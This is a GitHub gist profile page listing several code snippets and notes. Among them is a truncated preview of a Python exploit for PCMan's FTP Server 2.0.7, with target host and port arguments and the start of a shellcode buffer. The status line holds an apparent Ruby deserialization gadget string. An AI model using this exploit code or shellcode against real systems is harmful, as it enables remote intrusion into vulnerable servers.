Skip to content

Instantly share code, notes, and snippets.

View 0-ali's full-sized avatar
🌴
{"^o"=>[{"0"=>"ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"}]}

Moe Ali 0-ali

🌴
{"^o"=>[{"0"=>"ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"}]}
  • 127.0.0.1
View GitHub Profile
@0-ali
0-ali / LICENSE.txt
Created November 7, 2017 07:18 — forked from jed/LICENSE.txt
generate random UUIDs
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 2, December 2004
Copyright (C) 2011 Jed Schmidt <http://jed.is>
Everyone is permitted to copy and distribute verbatim or modified
copies of this license document, and changing it is allowed as long
as the name is changed.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
@0-ali
0-ali / library.md
Created September 12, 2017 21:35
My Library
@0-ali
0-ali / PCMan.py
Created January 4, 2017 14:53
Final PCMan's FTP Server v2.0.7 Exploit
# Final PCMan's FTP Server v2.0.7 Exploit
import sys, socket, time
host = sys.argv[1] # Recieve IP from user
port = int(sys.argv[2]) # Recieve Port from user
buf = ""
buf += "\xda\xdf\xd9\x74\x24\xf4\x5b\xbe\xba\x06\x35\xe1\x31"
buf += "\xc9\xb1\x31\x83\xc3\x04\x31\x73\x14\x03\x73\xae\xe4"
@0-ali
0-ali / double-sign.markdown
Created November 9, 2016 21:51
Double Sign
@0-ali
0-ali / after-before.markdown
Created November 9, 2016 21:50
after&before
@0-ali
0-ali / jQuery.replace.js
Last active October 31, 2016 11:19
a jQuery method to replace text
(function ($) {
$.fn.replace = function (a, b) {
this.text(this.text().replace(a, b));
return this.text();
};
})(jQuery);
@0-ali
0-ali / inline-translator.md
Last active December 16, 2019 20:03
Create real-time/inline translator for VoIP calls.

Create real-time/inline translator for VoIP calls

Hey! Surely everybody tested Skype Translator and liked it,So if you want your own continue.